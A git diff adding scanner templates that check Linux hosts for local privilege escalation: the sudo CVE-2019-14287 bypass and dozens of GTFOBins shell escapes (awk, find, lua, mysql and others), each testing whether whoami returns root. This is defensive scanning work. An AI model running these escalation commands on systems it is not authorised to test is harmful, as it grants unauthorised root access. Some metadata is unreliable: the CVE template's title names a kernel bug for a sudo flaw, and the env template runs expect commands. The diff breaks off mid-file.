diff --git a/code/cves/2023/CVE-2019-14287.yaml b/code/cves/2023/CVE-2019-14287.yaml new file mode 100644 index 0000000000..25399daf6d --- /dev/null +++ b/code/cves/2023/CVE-2019-14287.yaml @@ -0,0 +1,38 @@ +id: CVE-2019-14287 + +info: + name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel + author: princechaddha + severity: high + description: | + In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u \#$((0xffffffff))" command. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287 + - https://www.exploit-db.com/exploits/47502 + metadata: + verified: true + max-request: 2 + vendor: canonical + product: ubuntu_linux + tags: cve,cve2019,sudo,ubuntu,linux,privesc,local + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + - engine: + - sh + - bash + source: | + sudo -u#-1 whoami + + matchers: + - type: dsl + dsl: + - '!contains(code_1_response, "root")' + - 'contains(code_2_response, "root")' + condition: and diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-aa-exec.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-aa-exec.yaml new file mode 100644 index 0000000000..5d33e08659 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-aa-exec.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-aa-exec + +info: + name: aa-exec - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/aa-exec/ + metadata: + verified: true + tags: code,linux,aa-exec,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + aa-exec whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo aa-exec whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-ash.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-ash.yaml new file mode 100644 index 0000000000..82d415caa8 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-ash.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-ash + +info: + name: Ash - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/ash/ + metadata: + verified: true + tags: code,linux,ash,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + ash -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo ash -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-awk.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-awk.yaml new file mode 100644 index 0000000000..14ea698598 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-awk.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-awk + +info: + name: awk - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/awk/ + metadata: + verified: true + tags: code,linux,awk,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + awk 'BEGIN {system("whoami")}' + + #SUDO + - engine: + - sh + - bash + source: | + sudo awk 'BEGIN {system("whoami")}' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-bash.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-bash.yaml new file mode 100644 index 0000000000..1dbef3a18b --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-bash.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-bash + +info: + name: Bash - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/bash/ + metadata: + verified: true + tags: code,linux,bash,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + bash -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo bash -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-cdist.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-cdist.yaml new file mode 100644 index 0000000000..e6fee4f371 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-cdist.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-cdist + +info: + name: Cdist - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/cdist/ + metadata: + verified: true + tags: code,linux,cdist,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + cdist shell -s whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo cdist shell -s whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-choom.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-choom.yaml new file mode 100644 index 0000000000..6bdb596aeb --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-choom.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-choom + +info: + name: choom - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/choom/ + metadata: + verified: true + tags: code,linux,choom,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + choom -n 0 whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo choom -n 0 whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-cpulimit.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-cpulimit.yaml new file mode 100644 index 0000000000..22596354a6 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-cpulimit.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-cpulimit + +info: + name: CPUlimit - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/cpulimit/ + metadata: + verified: true + tags: code,linux,cpulimit,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + cpulimit -l 100 -f whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo cpulimit -l 100 -f whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-csh.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-csh.yaml new file mode 100644 index 0000000000..0b59b82c11 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-csh.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-csh + +info: + name: csh - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/csh/ + metadata: + verified: true + tags: code,linux,csh,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + csh -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo csh -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-csvtool.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-csvtool.yaml new file mode 100644 index 0000000000..451c4bd3aa --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-csvtool.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-csvtool + +info: + name: csvtool - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/csvtool/ + metadata: + verified: true + tags: code,linux,csvtool,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + csvtool call 'whoami;false' /etc/passwd + + #SUDO + - engine: + - sh + - bash + source: | + sudo csvtool call 'whoami;false' /etc/passwd + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-dash.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-dash.yaml new file mode 100644 index 0000000000..65a3ec45ef --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-dash.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-dash + +info: + name: Dash - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/dash/ + metadata: + verified: true + tags: code,linux,dash,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + dash -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo dash -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-dc.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-dc.yaml new file mode 100644 index 0000000000..bab777f8c4 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-dc.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-dc + +info: + name: dc - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/dc/ + metadata: + verified: true + tags: code,linux,dc,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + dc -e '!whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo dc -e '!whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-distcc.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-distcc.yaml new file mode 100644 index 0000000000..fb11f719f0 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-distcc.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-distcc + +info: + name: distcc - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/distcc/ + metadata: + verified: true + tags: code,linux,distcc,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + distcc whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo distcc whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-elvish.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-elvish.yaml new file mode 100644 index 0000000000..e21e3bf5dd --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-elvish.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-elvish + +info: + name: elvish - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/elvish/ + metadata: + verified: true + tags: code,linux,elvish,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + elvish -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo elvish -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-encscript.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-encscript.yaml new file mode 100644 index 0000000000..69871d1189 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-encscript.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-enscript + +info: + name: enscript - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/enscript/ + metadata: + verified: true + tags: code,linux,enscript,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + enscript /dev/null -qo /dev/null -I 'whoami >&2' + + #SUDO + - engine: + - sh + - bash + source: | + sudo enscript /dev/null -qo /dev/null -I 'whoami >&2' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-env.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-env.yaml new file mode 100644 index 0000000000..5d69084b32 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-env.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-env + +info: + name: env - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/env/ + metadata: + verified: true + tags: code,linux,env,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + expect -c 'spawn whoami;interact' + + #SUDO + - engine: + - sh + - bash + source: | + sudo expect -c 'spawn whoami;interact' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-expect.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-expect.yaml new file mode 100644 index 0000000000..b6eca30cb7 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-expect.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-expect + +info: + name: expect - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/expect/ + metadata: + verified: true + tags: code,linux,expect,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + expect -c 'spawn whoami;interact' + + #SUDO + - engine: + - sh + - bash + source: | + sudo expect -c 'spawn whoami;interact' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-find.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-find.yaml new file mode 100644 index 0000000000..09574ac2ad --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-find.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-find + +info: + name: find - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/find/ + metadata: + verified: true + tags: code,linux,find,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + find . -exec whoami \; -quit + + #SUDO + - engine: + - sh + - bash + source: | + sudo find . -exec whoami \; -quit + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-fish.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-fish.yaml new file mode 100644 index 0000000000..62b32f6ecb --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-fish.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-fish + +info: + name: fish - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/fish/ + metadata: + verified: true + tags: code,linux,fish,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + fish -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo fish -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-flock.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-flock.yaml new file mode 100644 index 0000000000..8864b6e9ba --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-flock.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-flock + +info: + name: Flock - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/flock/ + metadata: + verified: true + tags: code,linux,flock,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + flock -u / whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo flock -u / whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-gawk.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-gawk.yaml new file mode 100644 index 0000000000..20348ee4fb --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-gawk.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-gawk + +info: + name: gawk - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/gawk/ + metadata: + verified: true + tags: code,linux,gawk,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + gawk 'BEGIN {system("whoami")}' + + #SUDO + - engine: + - sh + - bash + source: | + sudo gawk 'BEGIN {system("whoami")}' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-grc.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-grc.yaml new file mode 100644 index 0000000000..eaf176057e --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-grc.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-grc + +info: + name: grc - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/grc/ + metadata: + verified: true + tags: code,linux,grc,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + grc --pty whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo grc --pty whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-ionice.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-ionice.yaml new file mode 100644 index 0000000000..c3d8dc886a --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-ionice.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-ionice + +info: + name: ionice - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/ionice/ + metadata: + verified: true + tags: code,linux,ionice,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + ionice whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo ionice whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-julia.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-julia.yaml new file mode 100644 index 0000000000..07a88f8342 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-julia.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-julia + +info: + name: Julia - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/julia/ + metadata: + verified: true + tags: code,linux,julia,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + julia -e 'run(`whoami`)' + + #SUDO + - engine: + - sh + - bash + source: | + sudo julia -e 'run(`whoami`)' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-lftp.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-lftp.yaml new file mode 100644 index 0000000000..48240ca4da --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-lftp.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-lftp + +info: + name: lftp - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/lftp/ + metadata: + verified: true + tags: code,linux,lftp,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + lftp -c '!whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo lftp -c '!whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-ltrace.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-ltrace.yaml new file mode 100644 index 0000000000..de12f8c961 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-ltrace.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-ltrace + +info: + name: ltrace - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/ltrace/ + metadata: + verified: true + tags: code,linux,ltrace,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + ltrace -b -L whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo ltrace -b -L whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-lua.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-lua.yaml new file mode 100644 index 0000000000..560b16f07a --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-lua.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-lua + +info: + name: lua - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/lua/ + metadata: + verified: true + tags: code,linux,lua,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + lua -e 'os.execute("whoami")' + + #SUDO + - engine: + - sh + - bash + source: | + sudo lua -e 'os.execute("whoami")' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-mawk.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-mawk.yaml new file mode 100644 index 0000000000..d830a2fa96 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-mawk.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-mawk + +info: + name: mawk - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/mawk/ + metadata: + verified: true + tags: code,linux,mawk,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + mawk 'BEGIN {system("whoami")}' + + #SUDO + - engine: + - sh + - bash + source: | + sudo mawk 'BEGIN {system("whoami")}' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-multitime.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-multitime.yaml new file mode 100644 index 0000000000..38878f634f --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-multitime.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-multitime + +info: + name: Multitime - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/multitime/ + metadata: + verified: true + tags: code,linux,multitime,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + multitime whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo multitime whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-mysql.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-mysql.yaml new file mode 100644 index 0000000000..e01b2bda0f --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-mysql.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-mysql + +info: + name: MySQL - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/mysql/ + metadata: + verified: true + tags: code,linux,mysql,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + mysql -e '\! whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo mysql -e '\! whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-nawk.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-nawk.yaml new file mode 100644 index 0000000000..c8f76a4dae --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-nawk.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-nawk + +info: + name: nawk - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/nawk/ + metadata: + verified: true + tags: code,linux,nawk,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + nawk 'BEGIN {system("whoami")}' + + #SUDO + - engine: + - sh + - bash + source: | + sudo nawk 'BEGIN {system("whoami")}' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-nice.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-nice.yaml new file mode 100644 index 0000000000..770007cde1 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-nice.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-nice + +info: + name: Nice - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/nice/ + metadata: + verified: true + tags: code,linux,nice,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + nice whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo nice whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-node.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-node.yaml new file mode 100644 index 0000000000..40c9dc4f9d --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-node.yaml @@ -0,0 +1,54 @@ +id: privilege-escalation-node + +info: + name: Node - Privilege Escalation + author: daffainfo + severity: high + reference: 